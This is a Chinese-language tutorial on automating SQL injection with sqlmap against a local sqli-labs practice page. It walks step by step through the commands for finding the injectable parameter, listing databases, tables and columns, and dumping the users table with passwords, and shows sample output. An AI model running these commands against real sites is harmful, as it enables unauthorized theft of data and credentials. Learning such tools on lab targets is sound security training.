我们在前面的文章已经介绍了SQL注入的挖掘方法以及渗透利用方法,这篇文章,我们学习一下如何利用工具高效的进行sqlmap 的渗透利用。 我们知道,手工制作payload并渗透利用是最基本的能力,但是这种方式的进展缓慢,不利于在实战中快速高效的扩大战果, 那么,有没有快速利用的工具呢? 答案是有的,前辈们早就开发了许多自动化利用的工具, 今天我们学习一个非常好用的SQL注入工具,sqlmap.
这篇文章主要关注如下内容:
sqlmap的安装还是比较简单的,网上一搜就可以搜到。 在linux操作系统和window操作系统都是可以安装的。
set http_proxy=
set https_proxy=
有了自动化工具,就方便了许多, 我们不需要再一个一个手工的构造payload 然后尝试在参数中添加符号进行测试;我们只需要在工具中输入一个url,sqlmap就可以自动识别url中的参数并构造payload探测。
http://127.0.0.1/Less-1/?id=1
我们可以执行如下命令进行探测:
sqlmap.py -u http://127.0.0.1/Less-1/?id=1如果有漏洞,则sqlmap会显示存在漏洞的具体参数。若有多个参数,可以按回车键依次进行sql注入漏洞的测试。
sqlmap.py -u http://127.0.0.1/Less-1/?id=1 --dbs结果如下:
available databases [7]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] sys
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security --tables
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security -T users --columns
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
python sqlmap.py -u http://127.0.0.1:81/Less-1?id=1 -D security -T users -C id,password,username --dump
+----+------------+----------+
| id | p word | name |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
这篇文章,我们学习了sqlmap工具的使用思路。了解了这些基本的使用方法,后续就知道我们怎么自动化进行sql注入漏洞了。 当然,sqlmap的各种高级用法还有很多,本文没有全面讲解所有的命令, 我们在学习或者实战的过程中, 只要有一个明确的思路,然后需要到什么知识点,网上搜索查询并慢慢积累便可。 后续会在演练或者实战过程中不断提升自身能力。
参考资料:
https://blog.csdn.net/weixin_59679023/article/details/123503849
https://zhuanlan.zhihu.com/p/394955217
https://github.com/sqlmapproject/sqlmap